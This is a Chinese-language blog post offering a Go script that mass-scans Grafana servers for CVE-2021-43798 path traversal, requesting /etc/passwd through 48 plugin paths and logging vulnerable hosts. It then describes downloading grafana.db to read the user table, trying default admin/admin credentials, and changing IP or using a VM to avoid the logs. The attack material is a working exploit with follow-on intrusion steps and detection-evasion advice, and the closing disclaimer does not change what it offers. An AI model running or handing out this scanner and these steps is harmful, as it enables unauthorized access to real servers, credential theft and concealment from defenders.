项目地址:https://github.com/light-Life/CVE-2021-43798
用golang简单写的脚本
package main
import (
"bufio"
"fmt"
"io"
"io/ioutil"
"net/http"
url2 "net/url"
"os"
"strings"
)
func main() {
fileOpen, err := os.Open("url.txt")
line := bufio.NewReader(fileOpen)
if err != nil {
fmt.Println(err)
}
test := []string{
"/public/plugins/alertGroups/",
"/public/plugins/alertlist/",
"/public/plugins/alertmanager/",
"/public/plugins/annolist/",
"/public/plugins/barchart/",
"/public/plugins/bargauge/",
"/public/plugins/canvas/",
"/public/plugins/cloudwatch/",
"/public/plugins/dashboard/",
"/public/plugins/dashlist/",
"/public/plugins/debug/",
"/public/plugins/elasticsearch/",
"/public/plugins/gauge/",
"/public/plugins/geomap/",
"/public/plugins/gettingstarted/",
"/public/plugins/grafana-azure-monitor-datasource/",
"/public/plugins/grafana/",
"/public/plugins/graph/",
"/public/plugins/graphite/",
"/public/plugins/heatmap/",
"/public/plugins/histogram/",
"/public/plugins/influxdb/",
"/public/plugins/jaeger/",
"/public/plugins/live/",
"/public/plugins/logs/",
"/public/plugins/loki/",
"/public/plugins/mixed/",
"/public/plugins/mssql/",
"/public/plugins/mysql/",
"/public/plugins/news/",
"/public/plugins/nodeGraph/",
"/public/plugins/opentsdb/",
"/public/plugins/piechart/",
"/public/plugins/pluginlist/",
"/public/plugins/postgres/",
"/public/plugins/prometheus/",
"/public/plugins/stat/",
"/public/plugins/state-timeline/",
"/public/plugins/status-history/",
"/public/plugins/table-old/",
"/public/plugins/table/",
"/public/plugins/tempo/",
"/public/plugins/testdata/",
"/public/plugins/text/",
"/public/plugins/timeseries/",
"/public/plugins/welcome/",
"/public/plugins/xychart/",
"/public/plugins/zipkin"}
file, err := os.Create("test.txt") //创建文件
if err != nil {
fmt.Println(err)
}
for {
content, _, err := line.ReadLine()
if err == io.EOF {
break
}
fmt.Println(string(content))
for i := 0; i < 48; i++ {
url := string(content) + test[i] + url2.QueryEscape("../../../../../../../../../../../../../../../../../etc/passwd")
//fmt.Println(url)
resp, err := http.Get(url)
if err != nil {
fmt.Println(err)
continue //continue忽略当前循环体内的剩下代码,相当于python异常里的pass,
// 这里很关键,如果这里有错误,下面ioutil.ReadAll就无法读取到数据,
// 就会报空指针错误,加上return返回一下因为这里没值,所以就相当于python的pass。
}
fmt.Println(resp, url)
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Println(body, err)
}
if find := strings.Contains(string(body), "root:"); find {
fmt.Println("\n\u001B[1;32m[+] 存在漏洞\u001B[0m", url)
data, err := io.WriteString(file, url+"\n")
fmt.Println("\n\u001B[1;33m[+] 正在写入\u001B[0m")
if err != nil {
fmt.Println(data, err)
}
break
} else {
fmt.Println("\n\u001B[1;31m[-] 无法识别\u001B[0m", url)
}
}
}
}
直接go run hello.go运行即可
验证存在后访问var/lib/grafana/grafana.db
即可下载这个数据库文件打开user的表
密码是加了盐的,一般无法破解(加盐是为了应对短密码被彩虹表爆出来
也就是碰撞盐(salt)是个随机值,加密大概公式为md5(md5(passwd)+salt)每多一位破解难度成指数上升)
发现这login为admin的一般密码也为admin
登录进去即可,记得改ip或在虚拟机登录,后台会有详细记录的
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论